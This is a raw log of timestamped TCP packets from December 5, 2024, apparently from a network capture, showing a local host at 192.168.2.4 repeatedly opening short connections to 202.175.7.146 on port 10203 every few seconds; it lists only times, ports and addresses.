              Dec 5, 2024 05:30:22.146651030 CET1020349742202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:22.152235031 CET4974210203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:22.271997929 CET1020349742202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:22.706381083 CET1020349742202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:22.706522942 CET1020349742202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:22.706576109 CET1020349742202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:22.706612110 CET4974210203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:22.706922054 CET1020349742202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:22.706979036 CET4974210203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:22.707016945 CET1020349742202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:22.707125902 CET1020349742202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:22.707138062 CET4974210203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:22.707237005 CET4974210203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:22.707237005 CET4974210203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:22.823698997 CET4974410203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:22.826780081 CET1020349742202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:22.826911926 CET1020349742202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:22.826941013 CET1020349742202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:22.943536997 CET1020349744202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:22.943756104 CET4974410203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:22.944230080 CET4974410203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:23.063843012 CET1020349744202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:24.482992887 CET1020349744202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:24.522818089 CET4974410203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:24.761292934 CET1020349744202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:24.762964964 CET4974410203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:24.882636070 CET1020349744202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:25.304428101 CET1020349744202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:25.351032019 CET4974410203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:25.573316097 CET1020349744202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:25.616480112 CET4974410203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:25.736282110 CET1020349744202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:26.160742044 CET1020349744202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:26.161062002 CET1020349744202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:26.161102057 CET4974410203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:26.161127090 CET1020349744202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:26.161422014 CET1020349744202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:26.161458015 CET4974410203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:26.161485910 CET1020349744202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:26.161497116 CET1020349744202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:26.161529064 CET4974410203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:26.188894987 CET4974410203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:26.188916922 CET4974410203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:26.308717012 CET1020349744202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:26.308756113 CET1020349744202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:26.309210062 CET4974510203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:26.428972960 CET1020349745202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:26.429171085 CET4974510203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:26.429706097 CET4974510203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:26.549355030 CET1020349745202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:27.976960897 CET1020349745202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:28.022883892 CET4974510203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:28.250070095 CET1020349745202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:28.251147032 CET4974510203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:28.370918036 CET1020349745202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:28.796257973 CET1020349745202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:28.850917101 CET4974510203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:29.077537060 CET1020349745202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:29.078488111 CET4974510203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:29.198225021 CET1020349745202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:29.625983000 CET1020349745202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:29.626008034 CET1020349745202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:29.626015902 CET1020349745202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:29.626112938 CET1020349745202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:29.626122952 CET1020349745202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:29.626163960 CET4974510203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:29.626163960 CET4974510203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:29.626188993 CET1020349745202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:29.626240015 CET4974510203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:29.626478910 CET4974510203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:29.626504898 CET4974510203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:29.746716022 CET4974610203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:29.747754097 CET1020349745202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:29.747767925 CET1020349745202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:29.868091106 CET1020349746202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:29.868212938 CET4974610203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:29.868674994 CET4974610203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:29.988343000 CET1020349746202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:31.414546013 CET1020349746202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:31.460309029 CET4974610203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:31.681577921 CET1020349746202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:31.682976961 CET4974610203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:31.802830935 CET1020349746202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:32.222465038 CET1020349746202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:32.272799969 CET4974610203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:32.493406057 CET1020349746202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:32.494384050 CET4974610203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:32.614075899 CET1020349746202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:33.036101103 CET1020349746202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:33.036190033 CET1020349746202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:33.036284924 CET1020349746202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:33.036345005 CET4974610203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:33.036365032 CET1020349746202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:33.036406994 CET4974610203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:33.036423922 CET1020349746202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:33.036433935 CET1020349746202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:33.036474943 CET4974610203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:33.036540985 CET4974610203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:33.036565065 CET4974610203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:33.150821924 CET4974710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:33.156430006 CET1020349746202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:33.156441927 CET1020349746202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:33.270643950 CET1020349747202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:33.271053076 CET4974710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:33.271411896 CET4974710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:33.391097069 CET1020349747202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:34.834613085 CET1020349747202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:34.882222891 CET4974710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:35.116631985 CET1020349747202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:35.117844105 CET4974710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:35.237675905 CET1020349747202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:35.670008898 CET1020349747202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:35.710313082 CET4974710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:35.959770918 CET1020349747202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:35.960649967 CET4974710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:36.080600977 CET1020349747202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:36.514889956 CET1020349747202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:36.514971018 CET1020349747202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:36.514985085 CET1020349747202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:36.515023947 CET4974710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:36.515250921 CET1020349747202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:36.515290976 CET4974710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:36.515306950 CET1020349747202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:36.515326977 CET1020349747202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:36.515364885 CET4974710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:36.528309107 CET4974710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:36.528309107 CET4974710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:36.648124933 CET1020349747202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:36.648185968 CET1020349747202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:37.059025049 CET4974810203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:37.178824902 CET1020349748202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:37.178924084 CET4974810203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:37.199579954 CET4974810203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:37.319442034 CET1020349748202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:38.713826895 CET1020349748202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:38.757230043 CET4974810203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:38.994013071 CET1020349748202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:38.995172024 CET4974810203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:39.114933968 CET1020349748202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:39.534595013 CET1020349748202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:39.585304022 CET4974810203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:39.806442022 CET1020349748202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:39.814858913 CET4974810203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:39.934674025 CET1020349748202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:40.356717110 CET1020349748202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:40.356822968 CET1020349748202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:40.356870890 CET1020349748202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:40.356877089 CET4974810203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:40.357064962 CET1020349748202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:40.357110023 CET4974810203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:40.357114077 CET1020349748202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:40.357125044 CET1020349748202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:40.357177019 CET4974810203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:40.357229948 CET4974810203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:40.357263088 CET4974810203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:40.463591099 CET4974910203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:40.476865053 CET1020349748202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:40.476907015 CET1020349748202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:40.583391905 CET1020349749202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:40.583657980 CET4974910203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:40.584011078 CET4974910203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:40.703752041 CET1020349749202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:42.136499882 CET1020349749202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:42.179152966 CET4974910203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:42.424180031 CET1020349749202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:42.425446987 CET4974910203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:42.545267105 CET1020349749202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:42.973033905 CET1020349749202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:43.022874117 CET4974910203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:43.251677036 CET1020349749202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:43.252449989 CET4974910203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:43.372230053 CET1020349749202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:43.802083969 CET1020349749202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:43.802103043 CET1020349749202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:43.802161932 CET1020349749202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:43.802174091 CET4974910203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:43.802418947 CET1020349749202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:43.802429914 CET1020349749202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:43.802474976 CET4974910203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:43.802495956 CET1020349749202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:43.802530050 CET4974910203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:43.802542925 CET4974910203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:43.917052984 CET4975010203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:43.922173977 CET1020349749202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:43.922197104 CET1020349749202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:44.037046909 CET1020349750202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:44.037353039 CET4975010203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:44.037715912 CET4975010203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:44.157466888 CET1020349750202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:45.590770960 CET1020349750202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:45.632325888 CET4975010203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:45.876826048 CET1020349750202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:45.878205061 CET4975010203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:45.997968912 CET1020349750202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:46.425532103 CET1020349750202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:46.476138115 CET4975010203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:46.704785109 CET1020349750202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:46.706795931 CET4975010203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:46.826570034 CET1020349750202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:47.256119967 CET1020349750202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:47.256443024 CET1020349750202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:47.256494045 CET4975010203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:47.256526947 CET1020349750202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:47.256537914 CET1020349750202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:47.256550074 CET1020349750202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:47.256628990 CET4975010203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:47.257858038 CET4975010203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:47.257884979 CET4975010203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:47.373964071 CET4975110203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:47.377564907 CET1020349750202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:47.377577066 CET1020349750202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:47.493772030 CET1020349751202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:47.493865967 CET4975110203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:47.512339115 CET4975110203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:47.632262945 CET1020349751202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:49.052923918 CET1020349751202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:49.100965023 CET4975110203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:49.333165884 CET1020349751202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:49.334413052 CET4975110203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:49.454200029 CET1020349751202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:49.884655952 CET1020349751202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:49.929089069 CET4975110203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:50.161142111 CET1020349751202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:50.210359097 CET4975110203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:50.220684052 CET4975110203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:50.340543032 CET1020349751202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:50.773137093 CET1020349751202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:50.773154974 CET1020349751202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:50.773161888 CET1020349751202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:50.773282051 CET4975110203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:50.773291111 CET1020349751202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:50.773334980 CET4975110203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:50.773339987 CET1020349751202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:50.773392916 CET1020349751202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:50.773428917 CET4975110203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:50.773643017 CET4975110203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:50.773677111 CET4975110203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:50.885339975 CET4975210203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:50.893317938 CET1020349751202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:50.893331051 CET1020349751202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:51.005407095 CET1020349752202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:51.005475044 CET4975210203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:51.006028891 CET4975210203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:51.125861883 CET1020349752202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:52.554085016 CET1020349752202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:52.600989103 CET4975210203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:52.825006962 CET1020349752202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:52.828099966 CET4975210203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:52.947887897 CET1020349752202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:53.369657040 CET1020349752202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:53.413461924 CET4975210203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:53.652733088 CET1020349752202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:53.653691053 CET4975210203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:53.773637056 CET1020349752202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:54.199254036 CET1020349752202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:54.199273109 CET1020349752202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:54.199285030 CET1020349752202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:54.199295044 CET1020349752202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:54.199300051 CET1020349752202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:54.199318886 CET1020349752202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:54.199352980 CET4975210203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:54.199393034 CET4975210203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:54.199601889 CET4975210203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:54.199634075 CET4975210203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:54.306965113 CET4975310203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:54.319405079 CET1020349752202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:54.319417000 CET1020349752202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:54.426997900 CET1020349753202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:54.427309990 CET4975310203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:54.427592993 CET4975310203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:54.547333002 CET1020349753202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:55.977760077 CET1020349753202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:56.022958994 CET4975310203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:56.251940012 CET1020349753202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:56.271480083 CET4975310203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:56.391227961 CET1020349753202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:56.845779896 CET1020349753202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:56.897885084 CET4975310203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:57.126533985 CET1020349753202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:57.127438068 CET4975310203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:57.247186899 CET1020349753202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:57.676826954 CET1020349753202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:57.676897049 CET1020349753202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:57.676919937 CET1020349753202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:57.676976919 CET4975310203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:57.677017927 CET1020349753202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:57.677056074 CET4975310203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:57.677088022 CET1020349753202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:57.677228928 CET4975310203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:57.677256107 CET4975310203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:57.677280903 CET1020349753202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:57.678165913 CET4975310203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:57.791796923 CET4975610203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:57.797048092 CET1020349753202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:57.797061920 CET1020349753202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:57.797765017 CET1020349753202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:57.911720991 CET1020349756202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:57.911840916 CET4975610203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:57.912266016 CET4975610203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:58.031872034 CET1020349756202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:59.456434965 CET1020349756202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:59.507245064 CET4975610203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:59.730838060 CET1020349756202.175.7.146192.168.2.4
              Dec 5, 2024 05:30:59.732033014 CET4975610203192.168.2.4202.175.7.146
              Dec 5, 2024 05:30:59.851798058 CET1020349756202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:00.273228884 CET1020349756202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:00.319742918 CET4975610203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:00.543104887 CET1020349756202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:00.547848940 CET4975610203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:00.667700052 CET1020349756202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:01.091344118 CET1020349756202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:01.091367960 CET1020349756202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:01.091413021 CET4975610203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:01.180377960 CET1020349756202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:01.180394888 CET1020349756202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:01.180411100 CET1020349756202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:01.180428028 CET1020349756202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:01.180475950 CET4975610203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:01.180517912 CET4975610203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:01.180633068 CET4975610203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:01.180660009 CET4975610203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:01.297566891 CET4976710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:01.300940037 CET1020349756202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:01.300954103 CET1020349756202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:01.417481899 CET1020349767202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:01.417608023 CET4976710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:01.418103933 CET4976710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:01.537863970 CET1020349767202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:02.991705894 CET1020349767202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:03.039067030 CET4976710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:03.273255110 CET1020349767202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:03.274447918 CET4976710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:03.394222021 CET1020349767202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:03.827326059 CET1020349767202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:03.882308960 CET4976710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:04.116420984 CET1020349767202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:04.118400097 CET4976710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:04.238331079 CET1020349767202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:04.674012899 CET1020349767202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:04.674046040 CET1020349767202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:04.674105883 CET1020349767202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:04.674236059 CET4976710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:04.674282074 CET1020349767202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:04.674321890 CET4976710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:04.674324036 CET1020349767202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:04.674338102 CET1020349767202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:04.674386024 CET4976710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:04.676162004 CET4976710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:04.676193953 CET4976710203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:04.806330919 CET4977310203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:04.827924967 CET1020349767202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:04.827941895 CET1020349767202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:04.926136971 CET1020349773202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:04.926347017 CET4977310203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:04.926706076 CET4977310203192.168.2.4202.175.7.146
              Dec 5, 2024 05:31:05.046350002 CET1020349773202.175.7.146192.168.2.4
              Dec 5, 2024 05:31:06.465714931 CET1020349773202.175.7.146192.168.2.4
